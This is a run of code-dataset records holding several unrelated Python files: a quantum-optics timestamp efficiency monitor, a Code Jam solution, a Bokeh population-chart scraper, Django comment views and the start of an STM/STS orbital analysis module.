2022-12-01\n\nNote:\n Configuration specification follows the philosophy of ConfigArgParse[1].\n Previous idea to use extensible sections (via overriding of profiles),\n but its utility typically only applies up to three layers, in increasing\n precedence, i.e.\n\n 1. Default (platform-specific, e.g. TTL inputs)\n 2. Profile (setup-specific, e.g. specific delays)\n 3. Sub-profile (setup-specific variations, e.g. longer integration)\n\n This can be mapped into the respective ConfigArgParse input methods:\n\n 1. Default configuration file (i.e. 'inst_efficiency.py.default.conf')\n 2. Specified configuration file (via '--config' option)\n 3. Command line arguments, with highest precedence\n\nReferences:\n [1] https://github.com/bw2/ConfigArgParse\n\"\"\"\n\nimport datetime as dt\nimport logging\nimport pathlib\nimport re\nimport sys\nimport time\nfrom itertools import product\n\nimport configargparse\nimport numpy as np\nimport tqdm\n\nfrom S15lib.g2lib import g2lib as g2\nfrom S15lib.instruments import LCRDriver, TimestampTDC2\n\n# Constants\nINT_MIN = np.iinfo(np.int64).min # indicate invalid value in int64 array\nRE_ANSIESCAPE = re.compile(r\"\\x1B(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~])\")\n\n# Colorama\nCOLORAMA_IMPORTED = False\ntry:\n import colorama\n\n COLORAMA_IMPORTED = True\n try:\n colorama.just_fix_windows_console()\n COLORAMA_INIT = False\n except AttributeError:\n colorama.init()\n COLORAMA_INIT = True\nexcept ModuleNotFoundError:\n pass # colorama does not exist, disable coloring\n\n\ndef style(text, fg=None, bg=None, style=None, clear=False, up=0):\n \"\"\"Returns text with ANSI wrappers for each line.\n\n Special note on newlines, where lines are broken up to apply\n formatting on individual lines, excluding the newline character.\n\n Position of start of print can be controlled using the 'up' arg.\n\n Usage:\n >>> print(s(\"hello\\nworld\", fg=\"red\", style=\"dim\"))\n hello\n world\n \"\"\"\n # Construct formatting\n fmt = \"\"\n for c, cls in zip((fg, bg), (colorama.Fore, colorama.Back)):\n if c:\n c = c.upper()\n if c.startswith(\"LIGHT\"):\n c += \"_EX\"\n fmt += getattr(cls, c)\n if style:\n fmt += getattr(colorama.Style, style.upper())\n\n # Force clear lines\n if clear:\n fmt = colorama.ansi.clear_line() + fmt\n\n # Break by individual lines to apply formatting\n lines = str(text).split(\"\\n\")\n lines = [f\"{fmt}{line}{colorama.Style.RESET_ALL}\" for line in lines]\n text = \"\\n\".join(lines)\n\n # Apply move and restore position\n # Assuming Cursor.DOWN will stop at bottom of current terminal printing\n # Non-positive numbers are treated strangely.\n if up > 0:\n text = colorama.Cursor.UP(up) + text + colorama.Cursor.DOWN(up)\n return text\n\n\ndef strip_ansi(text):\n return RE_ANSIESCAPE.sub(\"\", text)\n\n\ndef len_ansi(text):\n \"\"\"Returns length after removing ANSI codes.\"\"\"\n return len(strip_ansi(text))\n\n\ndef _request_filecomment(comment_cache=\".inst_efficiency.comment\") -> pathlib.Path:\n \"\"\"Request for comments to append to logfile and returns path to logfile.\"\"\"\n\n # If logging is enabled, request for filename\n # Search for any cached comments from previous runs\n path_comment = pathlib.Path(comment_cache)\n if path_comment.is_file():\n with open(path_comment, \"r\") as f:\n comment = f.read()\n else:\n comment = \"\" # default\n\n # Request for new comment from user, reassign only if issued\n _comment = re.sub(\" \", \"_\", input(f\"Enter comment [{comment}]: \"))\n if _comment:\n comment = _comment\n\n # Check writable to location\n path_logfile = _append_datetime_logfile(comment)\n with open(path_logfile, \"a\") as f:\n f.write(\"\")\n with open(path_comment, \"w\") as f:\n f.write(comment)\n\n return path_logfile\n\n\ndef _append_datetime_logfile(comment):\n return dt.datetime.now().strftime(f\"%Y%m%d_inst_efficiency_{comment}.log\")\n\n\ndef print_fixedwidth(*values, width=7, out=None, pbar=None, end=\"\\n\"):\n \"\"\"Prints right-aligned columns of fixed width.\n\n Note:\n The default column width of 7 is predicated on the fact that\n 10 space-separated columns can be comfortably squeezed into a\n 80-width terminal (with an extra buffer for newline depending\n on the shell).\n \"\"\"\n row = []\n for value in values:\n if value == INT_MIN:\n row.append(\" \" * width)\n else:\n # Measure length with ANSI control chars removed\n value = str(value)\n slen = max(0, width - len_ansi(value))\n row.append(\" \" * slen + value)\n line = \" \".join(row)\n\n if pbar:\n pbar.set_description(line)\n else:\n print(line, end=end)\n if out:\n line = \" \".join(\n [\n f\"{strip_ansi(str(value)) if value != INT_MIN else ' ': >{width}s}\"\n for value in values\n ]\n )\n with open(out, \"a\") as f:\n f.write(line + \"\\n\")\n\n\ndef read_log(filename: str, schema: list, merge: bool = False):\n \"\"\"Parses a logfile into a dictionary of columns.\n\n Convenience method to read out logfiles generated by the script.\n This is not filename-aware (i.e. date and schema version is not\n extracted from the filename) since these are not rigorously\n set-in-stone yet.\n\n Args:\n filename: Filename of log file.\n schema: List of datatypes to parse each column in logfile.\n merge:\n Whether multiple logging runs in the same file should\n be merged into a single list, or as a list-of-lists.\n\n Note:\n This code assumes tokens in columns do not contain spaces,\n including headers.\n\n TODO(Justin):\n Consider usage of PEP557 dataclasses for type annotations.\n Change the argument type of filename to include Path-like objects.\n Implement non-merge functionality.\n \"\"\"\n\n # Custom datatype\n def convert_time(s):\n \"\"\"Converts time in HHMMSS format to datetime object.\n\n Note:\n The default date is 1 Jan 1900.\n \"\"\"\n return dt.datetime.strptime(s, \"%H%M%S\")\n\n # Parse schema\n _maps = []\n for dtype in schema:\n # Parse special (hardcoded) types\n if isinstance(dtype, str):\n if dtype == \"time\":\n _map = convert_time\n else:\n raise ValueError(f\"Unrecognized schema value - '{dtype}'\")\n # Treat everything else as regular Python datatypes\n elif isinstance(dtype, type):\n _map = dtype\n else:\n raise ValueError(f\"Unrecognized schema value - '{dtype}'\")\n _maps.append(_map)\n\n # Read file\n is_header_logged = False\n _headers = []\n _data = []\n with open(filename, \"r\") as f:\n for row_str in f:\n # Squash all intermediate spaces\n row = re.sub(r\"\\s+\", \" \", row_str.strip()).split(\" \")\n try:\n # Equivalent to Pandas's 'applymap'\n row = [f(v) for f, v in zip(_maps, row)]\n _data.append(row)\n except Exception:\n # If fails, assume is string header\n if not is_header_logged:\n _headers = row\n is_header_logged = True\n\n if not is_header_logged:\n raise ValueError(\"Logfile does not contain a header.\")\n\n # Merge headers\n _data = np.array(list(zip(*_data))) # type: ignore\n _items = tuple(zip(_headers, _data)) # type: ignore\n return dict(_items)\n\n\n#############\n# SCRIPTS #\n#############\n\n# Collect program names\nPROGRAMS = {}\n\n\ndef _collect_as_script(alias=None):\n \"\"\"Decorator to dynamically collect functions for use as scripts.\"\"\"\n\n def collector(f):\n nonlocal alias\n if alias is None:\n alias = f.__name__\n PROGRAMS[alias] = f\n return f\n\n return collector\n\n\ndef read_pairs(params):\n \"\"\"Compute single pass pair statistics.\n\n Note:\n Parameter dictionary passed instead of directly into kwargs, since:\n 1. Minimize dependency with parser argument names\n 2. Functions in the stack can reuse arguments,\n e.g. monitor_pairs -> read_pairs\n \"\"\"\n\n # Unpack arguments into aliases\n bin_width = params[\"bin_width\"]\n bins = params[\"bins\"]\n peak = params[\"peak\"]\n roffset = params[\"window_right_offset\"]\n loffset = params[\"window_left_offset\"]\n duration = params[\"integration_time\"]\n darkcounts = [\n params[\"darkcount_ch1\"],\n params[\"darkcount_ch2\"],\n params[\"darkcount_ch3\"],\n params[\"darkcount_ch4\"],\n ]\n channel_start = params[\"channel_start\"] - 1\n channel_stop = params[\"channel_stop\"] - 1\n timestamp = params[\"timestamp\"]\n\n darkcount_start = darkcounts[channel_start]\n darkcount_stop = darkcounts[channel_stop]\n window_size = roffset - loffset + 1\n acc_start = max(bins // 2, 1) # location to compute accidentals\n while True:\n\n # Invoke timestamp data recording\n timestamp._call_with_duration([\"-a1\", \"-X\"], duration=duration)\n\n # Extract g2 histogram and other data\n data = g2.g2_extr(\n \"/tmp/quick_timestamp\",\n channel_start=channel_start,\n channel_stop=channel_stop,\n highres_tscard=True,\n bin_width=bin_width,\n bins=bins,\n # Include window at position 1\n min_range=peak + loffset - 1,\n )\n hist = data[0]\n s1, s2 = data[2:4]\n inttime = data[4] * 1e-9 # convert to units of seconds\n\n # Integration time check for data validity\n if not (0.75 < inttime / duration < 2):\n continue\n\n # Calculate statistics\n acc = window_size * np.mean(hist[acc_start:])\n pairs = sum(hist[1 : 1 + window_size]) - acc\n\n # Normalize to per unit second\n s1 = s1 / inttime - darkcount_start # timestamp data more precise\n s2 = s2 / inttime - darkcount_stop\n pairs = pairs / inttime\n acc = acc / inttime\n\n if s1 == 0 or s2 == 0:\n e1 = e2 = eavg = 0\n else:\n e1 = 100 * pairs / s2\n e2 = 100 * pairs / s1\n eavg = 100 * pairs / (s1 * s2) ** 0.5\n\n # Single datapoint collection completed\n break\n\n return hist, inttime, pairs, acc, s1, s2, e1, e2, eavg\n\n\n@_collect_as_script(\"pairs_once\")\ndef print_pairs(params):\n \"\"\"Pretty printed variant of 'read_pairs', showing pairs, acc, singles.\"\"\"\n _, _, pairs, acc, s1, s2, _, _, _ = read_pairs(params)\n print_fixedwidth(\n round(pairs, 1),\n round(acc, 1),\n int(s1),\n int(s2),\n width=0,\n )\n\n\n@_collect_as_script(\"pairs\")\ndef monitor_pairs(params):\n \"\"\"Prints out pair source statistics, between ch1 and ch4.\"\"\"\n # Unpack arguments into aliases\n peak = params[\"peak\"]\n roffset = params[\"window_right_offset\"]\n loffset = params[\"window_left_offset\"]\n enable_hist = params.get(\"histogram\", False)\n disable_hist = params.get(\"no_histogram\", False)\n logfile = params.get(\"logfile\", None)\n\n is_header_logged = False\n i = 0\n is_initialized = False\n prev = None\n longterm_data = {\"count\": 0, \"inttime\": 0, \"pairs\": 0, \"acc\": 0, \"s1\": 0, \"s2\": 0}\n while True:\n\n hist, inttime, pairs, acc, s1, s2, e1, e2, eavg = read_pairs(params)\n\n # Visualize g2 histogram\n HIST_ROWSIZE = 10\n if not is_initialized or enable_hist:\n is_initialized = True\n a = np.array(hist, dtype=np.int64)\n # Append NaN values until fits number of rows\n a = np.append(a, np.resize(INT_MIN, HIST_ROWSIZE - (a.size % HIST_ROWSIZE)))\n if not disable_hist:\n print(\"\\nObtained histogram:\")\n for row in a.reshape(-1, HIST_ROWSIZE):\n print_fixedwidth(*row)\n peakvalue = max(a)\n peakargmax = np.argmax(a)\n peakpos = peakargmax + peak + loffset - 1\n print(f\"Maximum {peakvalue} @ index {peakpos}\")\n\n # Display current window as well\n window_size = roffset - loffset + 1\n print(f\"Current window: {list(hist[1:window_size+1])}\")\n\n # Display likely window\n likely_window = [peakvalue]\n likely_left = None\n likely_right = None\n acc_bin = acc / window_size\n # Scan below\n i = 0\n while True:\n i += 1\n pos = peakargmax - i\n value = a[pos]\n if value > 2 * acc_bin:\n likely_window = [value] + likely_window\n else:\n likely_left = -(i - 1)\n break\n i = 0\n while True:\n i += 1\n pos = peakargmax + i\n value = a[pos]\n if value > 2 * acc_bin:\n likely_window = likely_window + [value]\n else:\n likely_right = i - 1\n break\n print(\n \"Likely window: \"\n f\"{list(a[likely_left+peakargmax:likely_right+1+peakargmax])}\"\n )\n print(\n f\"Args: --peak={peakpos} --left={likely_left} --right={likely_right}\\n\"\n )\n\n # Print the header line after every 10 lines\n if i == 0 or enable_hist:\n i = 10\n print_fixedwidth(\n \"TIME\",\n \"ITIME\",\n \"PAIRS\",\n \"ACC\",\n \"SINGLE1\",\n \"SINGLE2\",\n \"EFF1\",\n \"EFF2\",\n \"EFF_AVG\",\n out=logfile if not is_header_logged else None,\n )\n is_header_logged = True\n i -= 1\n\n # Print statistics\n print_fixedwidth(\n style(dt.datetime.now().strftime(\"%H%M%S\"), style=\"dim\"),\n round(inttime, 1),\n style(int(pairs), style=\"bright\"),\n round(acc, 1),\n style(int(s1), fg=\"yellow\", style=\"bright\"),\n style(int(s2), fg=\"green\", style=\"bright\"),\n round(e1, 1),\n round(e2, 1),\n style(round(eavg, 1), fg=\"cyan\", style=\"bright\"),\n out=logfile,\n )\n\n # Print long-term statistics, only if value supplied\n if params[\"averaging_time\"] > 0:\n # Update first\n longterm_data[\"count\"] += 1\n longterm_data[\"inttime\"] += inttime\n longterm_data[\"pairs\"] += pairs\n longterm_data[\"acc\"] += acc\n longterm_data[\"s1\"] += s1\n longterm_data[\"s2\"] += s2\n\n # Cache long term results if reach threshold\n if longterm_data[\"inttime\"] >= params[\"averaging_time\"]:\n counts = longterm_data[\"count\"]\n inttime = longterm_data[\"inttime\"]\n p = longterm_data[\"pairs\"] / counts\n acc = longterm_data[\"acc\"] / counts\n s1 = longterm_data[\"s1\"] / counts\n s2 = longterm_data[\"s2\"] / counts\n prev = (\n dt.datetime.now().strftime(\"%H%M%S\"),\n round(inttime, 1),\n style(int(round(p, 0)), fg=\"red\", style=\"bright\"),\n round(acc, 1),\n int(round(s1, 0)),\n int(round(s2, 0)),\n round(100 * p / s2, 1),\n round(100 * p / s1, 1),\n style(\n round(100 * p / (s1 * s2) ** 0.5, 1), fg=\"red\", style=\"bright\"\n ),\n )\n longterm_data = {\n \"count\": 0,\n \"inttime\": 0,\n \"pairs\": 0,\n \"acc\": 0,\n \"s1\": 0,\n \"s2\": 0,\n }\n\n # Print if exists\n if prev:\n print_fixedwidth(*prev, end=\"\\r\")\n\n\n@_collect_as_script(\"singles\")\ndef monitor_singles(params):\n \"\"\"Prints out singles statistics.\"\"\"\n # Unpack arguments into aliases\n duration = params[\"integration_time\"]\n darkcount_ch1 = params[\"darkcount_ch1\"]\n darkcount_ch2 = params[\"darkcount_ch2\"]\n darkcount_ch3 = params[\"darkcount_ch3\"]\n darkcount_ch4 = params[\"darkcount_ch4\"]\n timestamp = params[\"timestamp\"]\n logfile = params.get(\"logfile\", None)\n enable_avg = params.get(\"averaging\", False)\n\n is_header_logged = False\n i = 0\n avg = np.array([0, 0, 0, 0]) # averaging facility, e.g. for measuring dark counts\n avg_iters = 0\n while True:\n\n # Invoke timestamp data recording\n data = timestamp.get_counts(\n duration=duration,\n return_actual_duration=True,\n )\n counts = data[:4]\n inttime = data[4]\n\n # Rough integration time check\n if not (0.75 < inttime / duration < 2):\n continue\n if any(np.array(counts) < 0):\n continue\n\n counts = (\n counts[0] - darkcount_ch1 * inttime,\n counts[1] - darkcount_ch2 * inttime,\n counts[2] - darkcount_ch3 * inttime,\n counts[3] - darkcount_ch4 * inttime,\n )\n counts = np.array(counts)\n # VAHD\n # counts = counts/ np.array([1,1.057,0.788,0.631])\n # VDHA\n # counts = counts/ np.array([1,0.631,0.788,1.057])\n\n # Implement rolling average to avoid overflow\n if enable_avg:\n avg_iters += 1\n avg = (avg_iters - 1) / avg_iters * avg + np.array(counts) / avg_iters\n counts = np.round(avg, 1)\n\n # Print the header line after every 10 lines\n if i == 0:\n i = 10\n print_fixedwidth(\n \"TIME\",\n \"CH1\",\n \"CH2\",\n \"CH3\",\n \"CH4\",\n \"TOTAL\",\n out=logfile if not is_header_logged else None,\n )\n is_header_logged = True\n i -= 1\n\n # Print statistics\n print_fixedwidth(\n style(dt.datetime.now().strftime(\"%H%M%S\"), style=\"dim\"),\n *list(map(int, counts)),\n style(int(sum(counts)), style=\"bright\"),\n out=logfile,\n )\n\n\n@_collect_as_script(\"lcvr\")\ndef scan_lcvr_singles(params):\n timestamp = params[\"timestamp\"]\n target = dt.datetime.now().strftime(\"%Y%m%d_%H%M%S_lcvrsingles.log\")\n lcvr = LCRDriver(\n \"/dev/serial/by-id/\"\n \"usb-Centre_for_Quantum_Technologies_Quad_LCD_driver_QLC-QO05-if00\"\n )\n lcvr.all_channels_on()\n\n voltages = np.round(np.linspace(0.9, 5.5, 9), 3)\n combinations = product(voltages, repeat=4)\n\n pbar = tqdm.tqdm(combinations)\n for combination in pbar:\n\n # Set LCVR values\n lcvr.V1, lcvr.V2, lcvr.V3, lcvr.V4 = combination\n time.sleep(0.1)\n\n # Invoke timestamp data recording\n counts = timestamp.get_counts()\n counts = (\n counts[0],\n counts[1],\n counts[2],\n counts[3],\n )\n\n # Print statistics\n print_fixedwidth(\n dt.datetime.now().strftime(\"%H%M%S\"),\n *combination,\n *counts,\n out=target,\n pbar=pbar,\n )\n\n\n##########################\n# PRE-SCRIPT EXECUTION #\n##########################\n\n# Enumerate data processing arguments\nARGUMENTS = [\n \"bin_width\",\n \"bins\",\n \"peak\",\n \"window_left_offset\",\n \"window_right_offset\",\n \"integration_time\",\n \"averaging_time\",\n \"darkcount_ch1\",\n \"darkcount_ch2\",\n \"darkcount_ch3\",\n \"darkcount_ch4\",\n \"channel_start\",\n \"channel_stop\",\n]\n\nif __name__ == \"__main__\":\n # Request python-black linter to avoid parsing, for readability\n # fmt: off\n parser = configargparse.ArgumentParser(\n default_config_files=[\"./inst_efficiency.py.default.conf\"],\n description=\"Continuous printing of timestamp statistics\"\n )\n\n # Parser-level arguments\n # ConfigArgParse does not support multiple configuration files for same argument\n # Workaround by adding additional argument with similar argument name to supply\n # any secondary configuration, i.e. \"-c\" and \"-C\" both supplies configuration\n parser.add_argument(\n \"--config\", \"-c\", is_config_file_arg=True,\n help=\"Configuration file\")\n parser.add_argument(\n \"--save\", is_write_out_config_file_arg=True,\n help=\"Save configuration as file, and immediately exits program\")\n\n # Script-level arguments\n parser.add_argument(\n \"--averaging\", \"-a\", action=\"store_true\",\n help=\"Change to averaging singles mode\")\n parser.add_argument(\n \"--histogram\", \"-H\", action=\"store_true\",\n help=\"Enable histogram in pairs mode\")\n parser.add_argument(\n \"--no-histogram\", action=\"store_true\",\n help=\"Disable histogram in pairs mode. Overrides other histogram options.\")\n parser.add_argument(\n \"--logging\", \"-l\", nargs=\"?\", action=\"store\", const=\"unspecified\",\n help=\"Log stuff\")\n parser.add_argument(\n \"--verbose\", \"-v\", action=\"count\", default=0,\n help=\"Specify debug verbosity\")\n parser.add_argument(\n \"--quiet\", \"-q\", action=\"store_true\",\n help=\"Suppress errors, does not block logging\")\n parser.add_argument(\n \"script\", choices=PROGRAMS,\n help=\"Script to run\")\n\n # Device-level argument\n parser.add_argument(\n \"--device_path\", \"-U\", default=\"/dev/ioboards/usbtmst0\",\n help=\"Path to timestamp device\")\n parser.add_argument(\n \"--readevents_path\", \"-S\",\n default=\"/home/qitlab/programs/drivers/usbtmst4/apps/readevents7\",\n help=\"Path to readevents binary\")\n parser.add_argument(\n \"--outfile_path\", \"-O\", default=\"/tmp/quick_timestamp\",\n help=\"Path to temporary file for timestamp storage\")\n parser.add_argument(\n \"--threshvolt\", \"-t\", type=float, default=\"-0.4\",\n help=\"Pulse trigger level for each detector channel, comma-delimited\")\n parser.add_argument(\n \"--fast\", \"-f\", action=\"store_true\",\n help=\"Enable fast event readout mode, i.e. 32-bit wide events. Only for TDC2.\")\n\n # Data processing arguments\n parser.add_argument(\n \"--bin_width\", \"--width\", \"-W\", type=float, default=1,\n help=\"Size of time bin, in nanoseconds\")\n parser.add_argument(\n \"--bins\", \"-B\", type=int, default=500,\n help=\"Number of coincidence bins, in units of 'bin_width'\")\n parser.add_argument(\n \"--peak\", \"--window-center\", \"-M\", type=int, default=-250,\n help=\"Absolute bin location of coincidence window, in units of 'bin_width'\")\n parser.add_argument(\n \"--window_left_offset\", \"--left\", \"-L\", type=int, default=0,\n help=\"Left boundary of coincidence window relative to window middle\")\n parser.add_argument(\n \"--window_right_offset\", \"--right\", \"-R\", type=int, default=0,\n help=\"Right boundary of coincidence window relative to window middle\")\n parser.add_argument(\n \"--integration_time\", \"--time\", \"-T\", type=float, default=1.0,\n help=\"Integration time for timestamp, in seconds\")\n parser.add_argument(\n \"--averaging_time\", \"--atime\", type=float, default=0.0,\n help=\"Auxiliary long-term integration time, in seconds\")\n parser.add_argument(\n \"--darkcount_ch1\", \"--ch1\", \"-1\", type=float, default=0.0,\n help=\"Dark count level for detector channel 1, in counts/second\")\n parser.add_argument(\n \"--darkcount_ch2\", \"--ch2\", \"-2\", type=float, default=0.0,\n help=\"Dark count level for detector channel 1, in counts/second\")\n parser.add_argument(\n \"--darkcount_ch3\", \"--ch3\", \"-3\", type=float, default=0.0,\n help=\"Dark count level for detector channel 1, in counts/second\")\n parser.add_argument(\n \"--darkcount_ch4\", \"--ch4\", \"-4\", type=float, default=0.0,\n help=\"Dark count level for detector channel 1, in counts/second\")\n parser.add_argument(\n \"--channel_start\", \"--start\", type=int, default=1,\n help=\"Reference timestamp channel for calculating time delay offset\")\n parser.add_argument(\n \"--channel_stop\", \"--stop\", type=int, default=4,\n help=\"Target timestamp channel for calculating time delay offset\")\n parser.add_argument(\n \"--color\", action=\"store_true\",\n help=\"Add preset color highlighting to text in stdout\")\n # Reenable python-black linter\n # fmt: on\n\n # Do script only if arguments supplied\n # otherwise run as a normal script (for interactive mode)\n if len(sys.argv) > 1:\n args = parser.parse_args()\n\n # Set program logging verbosity\n levels = [\n logging.CRITICAL,\n logging.WARNING,\n logging.INFO,\n logging.DEBUG,\n ]\n logging.basicConfig(\n level=levels[min(args.verbose, 3)],\n format=\"{asctime} {levelname}: {message}\",\n style=\"{\",\n )\n logging.debug(\"Arguments: %s\", args)\n\n # Request for comments\n path_logfile = None\n if args.logging:\n\n # No arguments supplied, to query user manually\n if args.logging == \"unspecified\":\n path_logfile = _request_filecomment()\n\n # Comment for logfile supplied, use that\n else:\n path_logfile = _append_datetime_logfile(args.logging)\n\n # Silence all errors/tracebacks\n if args.quiet:\n sys.excepthook = lambda etype, e, tb: print()\n\n # Disable color if not explicitly enabled\n if not args.color or not COLORAMA_IMPORTED:\n style = lambda text, *args, **kwargs: text # noqa\n\n # Initialize timestamp\n timestamp = TimestampTDC2(\n device_path=args.device_path,\n readevents_path=args.readevents_path,\n outfile_path=args.outfile_path,\n )\n timestamp.threshold = args.threshvolt\n timestamp.fast = args.fast\n\n # Collect required arguments\n params = dict([(k, getattr(args, k, None)) for k in ARGUMENTS])\n params[\"logfile\"] = path_logfile\n params[\"histogram\"] = args.histogram\n params[\"no_histogram\"] = args.no_histogram\n params[\"averaging\"] = args.averaging\n params[\"timestamp\"] = timestamp\n\n # Call script\n PROGRAMS[args.script](params)\n","repo_name":"s-fifteen-instruments/pyS15","sub_path":"S15lib/apps/inst_efficiency.py","file_name":"inst_efficiency.py","file_ext":"py","file_size_in_byte":28593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23506824891","text":"from math import sqrt\r\ndef toDecimal(n, b):\r\n result = 0\r\n i = 0\r\n while n!=0:\r\n result += (n%10)*(b**i)\r\n n //= 10\r\n i += 1\r\n return result\r\n\r\ndef getDevisor(n):\r\n for i in range(2, int(sqrt(n))):\r\n if n%i == 0:\r\n return i\r\n\r\ndef binaryAdd2(n):\r\n n = str(n)\r\n for i in range(len(n)-2, -1, -1):\r\n if n[i] == '0':\r\n break\r\n return int(n[:i]+'1'+'0'*(len(n) - i-2)+'1')\r\n\r\ndef main():\r\n n = int(input())\r\n N = []\r\n J = []\r\n for i in range(n):\r\n line = input().split(' ')\r\n N.append(int(line[0]))\r\n J.append(int(line[1]))\r\n for i in range(n):\r\n print(\"Case #1:\")\r\n currNum = 10**(N[i]-1)+1\r\n for j in range( J[i] ):\r\n while(True):\r\n devisors = []\r\n for k in range(2, 11):\r\n d = getDevisor(toDecimal(currNum, k))\r\n if d:\r\n devisors.append(d)\r\n else:\r\n break\r\n if len(devisors) == 9:\r\n result = str(currNum)\r\n for k in devisors:\r\n result += ' '+str(k)\r\n print(result)\r\n currNum = binaryAdd2(currNum)\r\n break\r\n else:\r\n currNum = binaryAdd2(currNum)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_179/2263.py","file_name":"2263.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6500225256","text":"from bokeh.plotting import figure, show\nfrom bs4 import BeautifulSoup as BS\nimport requests\n\nurl = 'https://www.daxi-hro.tycg.gov.tw/home.jsp?id=25&parentpath=0,21,22'\ncontent = requests.get(url)\nparse = BS(content.text, 'html.parser')\n\nyear = []\nperson = []\ndata1 = parse.select(\"table[summary^='歷年戶數統計列表排版用']\")[0]\nrows = data1.find_all(\"tr\")\nfor row in rows:\n cols = row.find_all(\"td\")\n if len(cols) > 0:\n year.append(cols[0].text[:-1])\n person.append(cols[1].text)\n\np = figure(width = 800, height = 400, title = \"桃園市大溪區歷年戶數\")\np.title.text_font_size = \"24pt\"\np.xaxis.axis_label = \"年份\"\np.yaxis.axis_label = \"戶數\"\np.line(year, person, line_width = 2)\nshow(p)\n# Question: 調整x軸的數值寬度","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/Beginner Course/ch07/bokeh_people.py","file_name":"bokeh_people.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71109444676","text":"from django.shortcuts import render, redirect, get_object_or_404\n\n# Create your views here.\nfrom django.urls import reverse\nfrom django.views.generic import CreateView\nfrom django.views.generic import ListView\n\nfrom blog.models import Post\nfrom commets.forms import CommentModleForm\nfrom commets.models import Comment\n\n\ndef post_comment(request,pk):\n post = get_object_or_404(Post,pk=pk)\n form = CommentModleForm()\n if request.method == 'POST':\n form = CommentModleForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post_id = pk\n comment.save()\n # return redirect(reverse('blog:post_detail',kwargs={'pk':pk}))\n else:\n context = {\n 'post':post,\n 'form':form,\n }\n return render(request,'blog/detail.html',context)\n # return render(request,'blog/detail.html',{'form':form})\n return redirect(post)\n\n\n#修改为通用类试图\nclass PostComment(CreateView):\n model = Comment\n template_name = 'blog/detail.html'\n fields = ['name','email','url','context']\n def get_success_url(self):\n return reverse('blog:post_detail',kwargs={'pk':self.kwargs['pk']})\n\n def get_context_data(self, **kwargs):\n context = super(PostComment, self).get_context_data(**kwargs)\n post = get_object_or_404(Post,pk=self.kwargs['pk'])\n context.update({\n 'post':post,\n 'comment_list':post.comment_set.all()\n })\n # return super(PostComment, self).get_context_data()\n return context\n def form_valid(self, form):\n form.instance.post_id = self.kwargs['pk']\n return super().form_valid(form)\n def form_invalid(self, form):\n post = get_object_or_404(Post,self.kwargs['pk'])\n return render(self.request,'blog/detail.html',{\n 'post':post,\n 'comment_list':post.comment_set.all()\n })\n","repo_name":"fshFSH1387/mblog","sub_path":"commets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33345846908","text":"\"\"\"\nTools to perform STM/STS analysis on orbitals evaluated on grid\n\"\"\" \n\nimport os\nimport numpy as np\nimport scipy\nimport scipy.io\nimport scipy.special\nimport time\nimport copy\nimport sys\n\nimport re\nimport io\nimport ase\nimport ase.io\n\nfrom .cp2k_grid_orbitals import Cp2kGridOrbitals\n\nang_2_bohr = 1.0/0.52917721067\nhart_2_ev = 27.21138602\n\nclass STM:\n \"\"\"\n Class to perform STM and STS analysis on gridded orbitals\n \"\"\"\n\n def __init__(self, mpi_comm, cp2k_grid_orb, p_tip_ratios):\n\n self.cgo = cp2k_grid_orb\n self.nspin = self.cgo.nspin\n self.mpi_rank = self.cgo.mpi_rank\n self.mpi_size = self.cgo.mpi_size\n self.cell_n = self.cgo.eval_cell_n\n self.dv = self.cgo.dv\n self.origin = self.cgo.origin\n self.global_morb_energies = self.cgo.global_morb_energies\n\n self.mpi_comm = mpi_comm\n\n self.p_tip_ratios = p_tip_ratios\n # add a check if ptip needs to be calculated, as it can use a lot of memory\n self.ptip_enabled = True\n if all(r == 0.0 for r in p_tip_ratios):\n self.ptip_enabled = False\n\n self.global_morb_energies_by_rank = None\n\n self.z_arr = np.arange(0.0, self.cell_n[2]*self.dv[2], self.dv[2]) + self.origin[2]\n # to angstrom and WRT to topmost atom\n self.z_arr /= ang_2_bohr\n self.z_arr -= np.max(self.cgo.ase_atoms.positions[:, 2])\n\n # TODO: Would be nice to have a datatype containing orbitals and all of their grid info\n # and also to access planes above atoms at different heights...\n self.local_orbitals = None # orbitals defined in local space for this mpi_rank\n self.local_cell_n = None\n self.local_cell = None\n self.local_origin = None\n\n # p-tip contribution of the orbitals defined in local space for this mpi_rank\n self.local_orbital_ptip = None\n \n # Dictionary containing all the STM/STS/ORB output\n self.series_output = {}\n \"\"\"\n self.series_output = {\n 's0 orb': {\n 'general_info': {\n 'energies': [-0.4, -0.3, -0.1, ...],\n 'orb_indexes': [255, 256, 257, ...],\n 'HOMO': 257,\n },\n 'series_info': [\n {'type': 'ch-orb', 'height': 3.0},\n {'type': 'ch-sts', 'height': 3.0, 'fwhm': 0.1},\n ...,\n ],\n 'series_data': [\n [n_orb, nx, ny],\n [n_orb, nx, ny],\n ...,\n ]\n }\n 's1 orb': {\n ...\n }\n }\n \"\"\"\n\n\n def x_ind_per_rank(self, rank):\n # which x indexes to allocate to rank\n base_ix_per_rank = int(np.floor(self.cell_n[0] / self.mpi_size))\n extra_ix = self.cell_n[0] - base_ix_per_rank*self.mpi_size\n\n if rank < extra_ix:\n x_ind_start = rank*(base_ix_per_rank + 1)\n x_ind_end = (rank+1)*(base_ix_per_rank + 1)\n else:\n x_ind_start = rank*(base_ix_per_rank) + extra_ix\n x_ind_end = (rank+1)*(base_ix_per_rank) + extra_ix\n\n return x_ind_start, x_ind_end\n\n def divide_by_space(self):\n\n self.local_orbitals = []\n self.local_orbital_ptip = []\n\n x_ind_start, x_ind_end = self.x_ind_per_rank(self.mpi_rank)\n self.local_cell_n = np.array([x_ind_end - x_ind_start, self.cell_n[1], self.cell_n[2]])\n num_spatial_points = (x_ind_end - x_ind_start) * self.cell_n[1] * self.cell_n[2]\n\n self.local_origin = self.origin\n self.local_origin[0] += x_ind_start*self.dv[0]\n 